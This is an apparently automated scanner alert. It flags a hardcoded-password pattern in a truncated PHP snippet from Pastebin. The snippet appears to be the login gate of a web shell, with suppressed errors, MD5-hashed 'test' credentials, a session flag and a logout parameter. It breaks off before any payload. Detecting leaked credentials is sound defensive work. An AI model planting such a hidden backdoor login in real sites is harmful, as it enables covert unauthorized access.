Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*["'][a-z0-9\-_\!\$]+["']‘: <?php error_reporting(0); @session_start(); $username = "098f6bcd4621d373cade4e832627b4f6"; //test $password = "098f6bcd4621d373cade4e832627b4f6"; //test if (isset($_POST['user'])) { if (md5($_POST['user']) == $username && md5($_POST['pass']) == $password) { $_SESSION['loginh'] = "1"; } } if (isset($_GET['chaunow'])) { @session_destroy(); } if ($_SESSION['loginh'] == 1) { if (isse Source: http://pastebin.com/raw.php?i=cFSgvi2c
↧